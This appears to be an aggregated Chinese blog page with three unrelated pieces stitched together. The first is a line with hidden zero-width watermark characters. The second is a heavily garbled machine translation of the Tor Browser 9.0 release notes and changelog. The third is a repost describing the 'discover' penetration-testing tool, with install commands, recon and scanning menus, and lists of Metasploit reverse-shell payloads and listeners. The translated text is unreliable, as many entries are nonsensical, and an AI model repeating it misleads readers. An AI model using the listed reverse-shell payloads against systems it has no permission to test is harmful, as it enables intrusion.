④用来作为文章的水印,比如我这里的这句话,这篇文章被你复制走了,好像也看不出来是否是我的文章,但是,这‍​‍​‍​‏‏​‎‎​‎‎​‌‏​‍‎​‏‎​‏‏​‍​‌‏​‏​‏‏‌​‏‏‌​‍‏‏​‍‏‏​‌‎‍​‌‎​‌‏‌​‌‏‎​‌‎‌​‌‎‏​‏‏‌​‏‏‌​‌‌‏‎‏‌​‌‎‍‌‍‍​‏‏‌​‏‏‌一句里隐藏着水印,水印是什么自己去解密吧.

暗网浏览器9.0新版本发布 Tor Browser 9.0 洋葱浏览器9.0

暗网浏览器9.0新版本发布 Tor Browser 9.0 洋葱浏览器9.0 发布日期:2019年10月22日
暗网浏览器9.0新版本下载地址 torproject.org

Image may be NSFW.
Clik here to view.
暗网浏览器9.0

更新(7:30 UTC): 澄清的地区我们支持。 这是32 Tor浏览器9.0。

更新(10:45 UTC) :添加一段关于信箱。

Tor浏览器9.0现在是可用的 Tor浏览器下载页面 也从我们的 分布目录 。

这个版本功能很重要 安全更新 Firefox。

Tor浏览器Firefox 9.0是第一个稳定版本基于68 ESR和包含许多其他组件的更新(包括Tor 0.4.1.6 和OpenSSL 1.1.1d桌面版本和Tor 0.4.1.5 Android)。

除了所有需要的补丁垫底术和工具链的更新,我们做了大的改进使Tor浏览器工作更适合你。

我们希望世界上每个人都能够享受到在线Tor提供隐私和自由,这就是为什么在过去的几年,我们一直在努力提高用户体验和本地化的努力,第一次出现在最大的收益 Tor浏览器8.0 。

在Tor浏览器9.0中,我们继续构建在这些努力以时尚集成和额外的本地化的支持。

再见,洋葱按钮

我们希望您使用Tor的经验是完全集成在浏览器内所以你如何使用Tor更直观。 这就是为什么现在,而不是使用洋葱按钮在工具栏,你可以看到你的路径通过Tor网络和请求一个新的电路通过Tor网络在地址栏[我]。

Image may be NSFW.
Clik here to view.
暗网浏览器9.0
暗网浏览器9.0

你好,新的标识按钮

而不是放入洋葱按钮来请求一个新的身份,我们取得了这个重要的功能更容易访问通过给它自己的按钮在工具栏。

Image may be NSFW.
Clik here to view.
暗网浏览器9.0
暗网浏览器9.0

你也可以请求一个新的身份,和一个新的电路,从内部上的[=]菜单工具栏。

Torbutton和Tor发射器集成

现在这两个扩展紧密集成到Tor浏览器,他们将不再被发现 :插件 页面。

Image may be NSFW.
Clik here to view.
暗网浏览器9.0

我们重新设计了桥梁和代理配置对话框,包括他们直接在浏览器的偏好设置。

而不是洋葱背后的子菜单按钮,Tor网络设置,包括能够获取桥梁绕过审查Tor被阻塞,更容易访问 :# tor偏好

信箱

Tor浏览器的默认模式从一个内容窗口圆200 px x 100的倍数pxa防止指纹屏幕尺寸。 这里的策略是将所有用户在几桶很难单出来。 到目前为止工作直到用户开始调整他们的windows(如通过最大化或进入全屏模式)。 Tor浏览器9附带一个指纹防御这些场景,叫做 信箱 ,Mozilla和开发的技术 今年早些时候 。 它通过添加白色边缘一个浏览器窗口,窗口是尽可能接近所需的大小,用户仍在几个屏幕大小桶,防止挑出来的帮助下屏幕尺寸。

更好的本地化支持

如果我们想要所有的世界各地的人们能够使用我们的软件,那么我们需要确保它是讲他们的语言。 自8.0年 Tor浏览器已经有25种语言,我们添加了5个地区更多的Tor浏览器8.5。 今天,我们添加两个额外的支持语言:马其顿(可)和罗马尼亚(ro),将支持语言到32的数量。

我们在之前也固定错误发货本地化包(如ar和ko)。

非常感谢大家帮助这些,特别是 我们的翻译人员 。

已知问题

像往常一样准备Tor浏览器版本的时候,我们验证了构建 出现可再生的 。 当我们拿到两个匹配的构建,我们发现,在某些情况下,构建不同(我们发现这种情况发生 Linux i686 和 macOS 包)。 我们仍在调查这个问题的原因,解决它。

提供反馈

如果你发现一个错误或有什么建议我们如何可以改善这个版本, 请让我们知道 。 感谢所有的 团队在Tor 许多志愿者,贡献了这个版本。

更新日志

完整的 更新日志 自从Tor浏览器8.5.6是:

所有平台

Update Firefox to 68.2.0esr 
bug31740 :删除一些不必要的RemoteSettings实例 
bug13543 :恶搞光滑和powerEfficient媒体功能 
bug28196 ::偏好不正确翻译了 
bug19417 :禁用asmjs更安全、安全的安全水平 
bug30463 :显式禁用MOZ_TELEMETRY_REPORTING 
bug31935 :禁用概要下调保护 
bug16285 电磁辐射:禁用DRM /在Android上放Adobe清洁发展机制 
bug31602 :删除口袋指标在UI和禁用它 
bug31914 :修复eslint剥绒机bug 
bug30429 :火狐68 ESR变基补丁 
bug31144 :检查网络代码更改为Firefox 68 ESR 
bug10760 直接:Torbutton融入Tor浏览器 
bug25856 :除去Torbutton XUL覆盖 
bug31322 调试构建:修复:tor断言失败 
bug29430 :添加支持meek_lite bridgeParser桥梁 
bug28561 :“关于Tor浏览器”对话框来tor-browser迁移 
bug30683 通过一些* . properties:防止检测区域 
bug31298 :# 24056的补丁的补丁 
bug9336 :browserspy.dk奇怪wyswig计划没有隔离 
bug27601 :浏览器通知不工作了 
bug30845 :确保启用内部扩展 
bug28896 :在隐私浏览默认启用扩展 
bug31563 如果扩展:重载搜索扩展。 enabledScopes已经改变了 
bug31396 :解决NoScript通信安全设置 
bug31142 :修复崩溃的选项卡并干扰:打开 
bug29049 :补丁JS毒药补丁 
bug25214 :帆布数据提取地区应该允许pdf文件 
bug30657 :语言环境是通过html页面上标题的链接标签泄露 
bug31015 :禁用SVG隐藏在扩展UI图标 
bug30681 :设置security.enterprise_roots。 启用为假 
bug30538 英国《独立报》:无法置评 
bug31209 :在Tor查看PDF浏览器是模糊的 
翻译更新 

Windows + OS X + Linux

更新Tor 0.4.1.6 
更新OpenSSL 1.1.1d 
    bug31844 :OpenSSL 1.1.1d无法编译一些平台/架构 
更新Tor 0.2.20.1发射器 
    bug28044 :Tor发射器集成到tor-browser 
    bug32154 :自定义字段只允许一行输入的桥梁 
    bug31286 :新字符串:偏好# tor 
    bug31303 :不要在浏览器推出tor工具箱 
    bug32112 :修复坏&逃避翻译 
    bug31491 :清理旧的http助手浏览器配置文件 
    bug29197 :删除使用覆盖 
    bug31300 :修改Tor发射器与ESR68兼容 
    bug31487 :修改护城河客户机代码兼容ESR68 
    bug31488 护城河:支持一个以逗号分隔的传输 
    bug30468 :添加可现场 
    bug30469 :添加ro语言环境 
    bug30319 :删除FTE比特 
    翻译更新 
bug32092 在偏好:修复Tor浏览器支持链接 
bug32111 :固定问题解析用户提供的字符串的桥梁 
bug31749 :解决安全水平面板生成事件 
bug31920 :解决安全水平面板工具栏按钮移动到溢出 
bug31748 + 31961年 :解决“了解更多”链接在安全级别的偏好和面板 
bug28044 :Tor发射器集成到tor-browser 
bug31059 :允许信箱 
bug30468 :添加可现场 
bug30469 :添加ro语言环境 
bug29430 :使用obfs4proxy meek_lite的你而不是温顺 
bug31251 :安全级别按钮UI波兰 
bug31344 :注册SecurityLevelPreference“卸载”回调 
bug31286 :提供网络设置:偏好# tor 
bug31886 :ko包bustage修复 
bug31768 :更新新员工培训为Tor浏览器9 
bug27511 :添加新标识按钮工具栏 
bug31778 :支持电路显示UI的主题 
bug31910 :在电路显示meek_lite替换为温顺 
bug30504 :处理新身份相关浏览器控制台bug 
bug31929 :不要逃避DTD实体在基于“增大化现实”技术 
bug31747 :有些新员工培训UI总是英语所示 
bug32041 :=换成真正的汉堡图标‰¡ 
bug30304 :浏览器地区可以获得通过DTD字符串 
bug31065 :设置network.proxy。 allow_hijacking_localhost为真 
bug24653 :securityLevel合并。 属性到torbutton.dtd 
bug31164 :设置默认Karlstad大学的桥梁 
bug15563 :禁用ServiceWorkers在所有平台上 
bug31598 :禁用警告窗口大小调整如果启用了信箱 
bug31562 :修复电路显示bug页面 
bug31575 在启动:Firefox是打电话回家 
bug31491 :清理旧的http助手浏览器配置文件 
bug26345 :隐藏跟踪保护UI 
bug31601 推荐:禁用扩展了 
bug30662 :不显示Firefox回家打开新标签 
bug31457 :禁用每个安装配置文件 
bug28822 68年ESR:重新实现桌面新员工培训 

windows

bug31942 :重新启用签名检查语言包 
bug29013 为Firefox在Windows:启用堆栈保护 
bug30800 :ftp://在Windows上可以使用泄漏系统时区 
bug31547 :回补丁Mozilla bug的1574980 
bug31141 :在font.system.whitelist修复bug 
bug30319 :删除FTE比特 

OS X

bug30126 :让Tor浏览器兼容macOS 10.15 
bug31607 :应用程序菜单项在macOS停止工作 
bug31955 :在macOS避免扔在nonBrowserWindowStartup () 
bug29818 :68年esr适应# 13379块 
bug31464 :温顺和护城河是破碎的macOS 10.9与1.12 

Linux

bug31942 :重新启用签名检查语言包 
bug31646 更新:更新abicheck要求libstdc + + .so.6 
bug31968 :不要失败如果/proc/cpuinfo不是可读 
bug24755 :停止使用start-tor-browser heredoc 
bug31550 :把引号里面的单引号 
bug31394 :“1”替换为“ˆ’1”start-tor-browser.desktop 
bug30319 :删除FTE比特 

安卓

更新Tor 0.4.1.5 
bug31010 :变基移动68年Fennec补丁 
bug31010 :不要使用addTrustedTab()在移动 
bug30607 :支持Tor浏览器上运行Android问 
bug31192 :支持x86_64目标在Android上 
bug30380 :取消启动休眠 
bug30943 :显示版本号在移动 
bug31720 在地址栏:使网站的建议 
bug31822 :安全滑块在Android上不可见了 
bug24920 :只有在永久隐私浏览模式创建私人标签 
bug31730 :回复aarch64-workaround反对与jit相关的崩溃 
bug32097 :移动新员工培训而垫底术68.2.0esr解决冲突 

构建系统

所有平台 
    bug30585 跨所有平台:提供独立的叮当声8个项目 
    bug30376 1.34:使用生锈Tor浏览器9 
    bug30490 :添加cbindgen构建火狐68 ESR / Fennec 68项目 
    bug30701 :添加nodejs构建火狐68 ESR / Fennec 68项目 
        bug31621 :解决节点bug使大型写入标准输出失败 
    bug30734 :添加nasm构建火狐68 ESR / Fennec 68项目 
    bug31293 :确保容器内的lo接口 
    bug27493 :清理mozconfig选项 
    bug31308 :同步mozconfig文件用于tor-browser到tor-browser-build esr68吧 
windows 
    bug29307 :使用拉伸为Windows交叉编译 
    bug29731 :删除faketime Windows版本 
    bug30322 Firefox: Windows工具链更新68 ESR 
        bug28716 :创建mingw-w64-clang工具链 
        bug28238 :适应firefox和fxc2 Windows构建项目 
        bug28716 :有选择地忽略时间戳在PE头 
        bug31567 :NS_tsnprintf()不正确处理% s在Windows 
        bug31458 :# 27503和还原补丁撞mingw-w64修改使用 
    bug9898 在NSPR: strcmpi提供清洁修复问题 
    bug29013 :启用堆栈保护支持Firefox在Windows 
    bug30384 :使用64位的容器来构建32位Windows Tor浏览器 
    bug31538 :基于ESR的窗口包68非重复性良好 
    bug31584 :清理mingw-w64项目 
    bug31596 :撞mingw-w64版本为# 31567接修复 
    bug29187 :撞NSIS版本3.04 
    bug31732 :Windows构建破产是由于mingw-w64提交肿块 
    bug29319 :删除FTE支持窗口 
OS X 
    bug30323 :火狐68 ESR MacOS工具链的更新 
    bug31467 cctools项目:切换到叮当声 
    bug31465 :适应tor-browser-build项目macOS公证 
Linux 
    bug31448 :黄金和lld打破链接32位Linux包 
    bug31618 :Linux32构建Tor浏览器9.0 a6并不匹配 
    bug31450 :还在用GCC峨山构建 
    bug30321 68年Firefox ESR: Linux工具链的更新 
        bug30736 :安装yasm wheezy-backports 
        bug31447 :不要安装Python马赫 
    bug30448 :浏览器/ gtk2 / libmozgtk.so地带 
安卓 
    bug30324 68年Fennec: Android工具链的更新 
        bug31173 Firefox:更新android-toolchain项目匹配 
        bug31389 Firefox:更新Android构建叮当声 
        bug31388 :更新铁锈Android项目 
        bug30665 68:Firefox ESR与最新的android工具链 
        bug30460 :68年更新TOPL项目使用Firefox工具链 
        bug30461 :68年更新tor-android-service项目使用Firefox工具链 
    bug28753 :使用Gradle——离线浏览器在构建部分 
    bug31564 :基于ESR安卓包68可再生的 
    bug31981 :删除require-api.patch 
    bug31979 :TOPL:依赖列表进行排序 
    bug30665 :删除不必要的构建为Firefox补丁 

基于Metasploit写的一款自动化渗透测试工具-discover

基于Metasploit写的一款自动化渗透测试工具-discover
该工具可以自定义bash脚本用于自动化各种渗透测试任务,包括侦察、扫描、解析和使用metasploit创建恶意负载和侦听器。
项目地址:https://github.com/leebaird/discover

安装方法: 注意: 所有脚本必须从此位置运行

git clone https://github.com/leebaird/discover /opt/discover/
cd /opt/discover/
./update.sh

功能:

侦察
1.  Domain //域名侦察
2.  Person  //社工侦察
3.  Parse salesforce

扫描
4.  Generate target list  //生成目标清单
5.  CIDR  //扫描网站目录
6.  List
7.  IP, range, or domain
8.  Rerun Nmap scripts and MSF aux

web漏洞扫描
9.  Insecure direct object reference
10. Open multiple tabs in Firefox
11. Nikto
12. SSL

杂项
13. Parse XML
14. Generate a malicious payload
15. Start a Metasploit listener
16. Update
17. Exit

侦察

RECON

1.  Passive
2.  Active
3.  Import names into an existing recon-ng workspace
4.  Previous menu

被动使用后面瞎跑,dnsrecon goofile、goog-mail goohost,要, Metasploit URLCrazy,域名查询服务,多个网站,和recon-ng。

积极使用dnsrecon WAF00W traceroute, Whatweb, recon-ng。

[*]收购API密钥Bing,砖块,Fullcontact, GitHub, 谷歌、散列、猎人、SecurityTrails Shodan 最大的结果与recon-ng和要。

API key locations:

recon-ng
    show keys
    keys add bing_api <value>

theHarvester
    /opt/theHarvester/api-keys.yaml

侦察

RECON

First name:
Last name:
  • 结合信息从多个网站。

解析salesforce

Create a free account at salesforce (https://connect.data.com/login).
Perform a search on your target company > select the company name > see all.
Copy the results into a new file.

Enter the location of your list:
  • 收集到一个干净的列表中姓名及职务。

扫描

生成目标列表

SCANNING

1.  Local area network
2.  NetBIOS
3.  netdiscover
4.  Ping sweep
5.  Previous menu
  • 使用不同的工具来创建一个目标列表包括愤怒的IP扫描器,arp-scan netdiscover, nmap pingsweep。

CIDR、列表、IP、范围或URL

Type of scan:

1.  External
2.  Internal
3.  Previous menu
  • 外部扫描将nmap源端口53和max-rrt-timeout 1500 ms。
  • 内部扫描将nmap源端口88和max-rrt-timeout 500 ms。
  • Nmap是用于执行主机发现、端口扫描、枚举和操作系统识别服务。
  • 匹配nmap脚本用于额外的枚举。
  • 除了工具:enum4linux、smbclient ike-scan。
  • 匹配Metasploit辅助模块加以利用。

网络

不安全的直接对象引用

Using Burp, authenticate to a site, map & Spider, then log out.
Target > Site map > select the URL > right click > Copy URLs in this host.
Paste the results into a new file.

Enter the location of your file:

在火狐打开多个选项卡

Open multiple tabs in Firefox with:

1.  List
2.  Directories from robots.txt.
3.  Previous menu
  • 使用列表包含IPs和/或url。
  • 使用wget将一个域的机器人。 txt文件,然后打开所有的目录。

Nikto

Run multiple instances of Nikto in parallel.

1.  List of IPs.
2.  List of IP:port.
3.  Previous menu

SSL

检测ssl证书存在的问题.

Enter the location of your list:
  • 使用sslscan和sslyze检查SSL / TLS证书问题。

杂项

解析XML

Parse XML to CSV.

1.  Burp (Base64)
2.  Nessus (.nessus)
3.  Nexpose (XML 2.0)
4.  Nmap
5.  Qualys
6.  Previous menu

生成一个恶意的有效载荷

Malicious Payloads

1.   android/meterpreter/reverse_tcp
2.   cmd/windows/reverse_powershell
3.   java/jsp_shell_reverse_tcp (Linux)
4.   java/jsp_shell_reverse_tcp (Windows)
5.   linux/x64/meterpreter_reverse_https
6.   linux/x64/meterpreter_reverse_tcp
7.   linux/x64/shell/reverse_tcp
8.   osx/x64/meterpreter_reverse_https
9.   osx/x64/meterpreter_reverse_tcp
10.  php/meterpreter/reverse_tcp
11.  python/meterpreter_reverse_https
12.  python/meterpreter_reverse_tcp
13.  windows/x64/meterpreter_reverse_https
14.  windows/x64/meterpreter_reverse_tcp
15.  Previous menu

开始一个Metasploit侦听器

Metasploit Listeners

1.   android/meterpreter/reverse_tcp
2.   cmd/windows/reverse_powershell
3.   java/jsp_shell_reverse_tcp
4.   linux/x64/meterpreter_reverse_https
5.   linux/x64/meterpreter_reverse_tcp
6.   linux/x64/shell/reverse_tcp
7.   osx/x64/meterpreter_reverse_https
8.   osx/x64/meterpreter_reverse_tcp
9.   php/meterpreter/reverse_tcp
10.  python/meterpreter_reverse_https
11.  python/meterpreter_reverse_tcp
12.  windows/x64/meterpreter_reverse_https
13.  windows/x64/meterpreter_reverse_tcp
14.  Previous menu

基于Metasploit写的一款自动化渗透测试工具-discover
该工具可以自定义bash脚本用于自动化各种渗透测试任务,包括侦察、扫描、解析和使用metasploit创建恶意负载和侦听器。
项目地址:https://github.com/leebaird/discover

Viewing all 216 articles
Browse latest View live